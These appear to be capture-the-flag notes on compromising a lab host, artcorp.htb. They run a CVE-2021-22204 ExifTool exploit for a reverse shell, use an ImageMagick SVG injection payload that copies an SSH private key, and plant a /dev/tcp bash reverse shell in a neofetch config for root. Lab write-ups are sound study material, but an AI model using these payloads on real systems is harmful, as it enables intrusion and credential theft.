nmap -sC -sV -oA nmap 10.10.11.140 -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-24 17:36 GMT
Nmap scan report for 10.10.11.140
Host is up (0.13s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 12:81:17:5a:5a:c9:c6:00:db:f0:ed:93:64:fd:1e:08 (RSA)
|   256 b5:e5:59:53:00:18:96:a6:f8:42:d8:c7:fb:13:20:49 (ECDSA)
|_  256 05:e9:df:71:b5:9f:25:03:6b:d0:46:8d:05:45:44:20 (ED25519)
80/tcp open  http    Apache httpd
|_http-title: Did not follow redirect to http://artcorp.htb
|_http-server-header: Apache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.57 seconds



gobuster vhost -u http://artcorp.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt

Found: dev01.artcorp.htb (Status: 200) [Size: 247]



https://github.com/AssassinUKG/CVE-2021-22204

bash CVE-2021-2204.sh "reverseme 10.10.14.139 4444" testimonials-1.jpg

uid=33(www-data) gid=33(www-data) groups=33(www-data)

linpeas.sh

/usr/local/bin/convert_images.sh                                                                                  
/usr/bin/gettext.sh

https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html

SVG MSL polyglot file:

<image authenticate='ff" `echo $(cat ~/.ssh/id_rsa)> /dev/shm/key`;"'>

cd .config/neofetch

nano config.conf

na primeira linha  /bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/4444 0>&1"

export XDG_CONFIG_HOME="$HOME/.config"

sudo -u root /usr/bin/neofetch \"\"
